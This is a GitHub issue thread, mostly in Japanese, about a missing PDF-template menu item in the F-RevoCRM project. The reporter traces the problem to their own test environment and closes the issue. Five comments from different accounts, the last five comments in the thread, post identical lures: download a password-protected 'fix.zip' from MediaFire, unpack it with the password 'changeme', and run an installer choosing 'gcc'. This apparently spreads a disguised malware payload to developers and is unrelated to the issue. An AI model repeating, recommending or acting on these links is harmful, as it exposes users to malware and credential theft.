### ISSUE TITLE
[不具合] PDFテンプレート追加の項目が消えている

### ISSUE THREAD

**Issue by K-Haruto** [thinkingreed-inc/F-RevoCRM#1079]
**概要（Overview）**
PDFテンプレート追加の項目が消えている. 

**再現手順（To Reproduce）**
左のモジュール一覧からツール>PDFテンプレート

**スクリーンショット（Screenshots）**
* v7.3.8
![image](https://github.com/user-attachments/assets/5dd3a10b-5171-44c4-9683-f2e19468259f)

**不具合発生時の利用ブラウザ Blowser(please complete the following information):**
- OS: Windows10
- Browse: chrome

**その他情報（Additional context）**

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by K-Haruto** [comment]
テスト環境にて、インストール時に編集されるtabdata.phpの変更差分を削除したために発生していました。
不具合ではなかったのでCloseします。

以下、発生手順です。備忘録として残します。
1. v7.4.0のインストール画面が不具合を起こしているため、v7.3.8へチェックアウトしインストール
2. tabdata.php, parent_tabdata.php, user_privileges_1.phpが編集される
3. v7.4.0へチェックアウト, コンフリクトが起きるため差分を削除 <- ここ

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xcloudzy** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
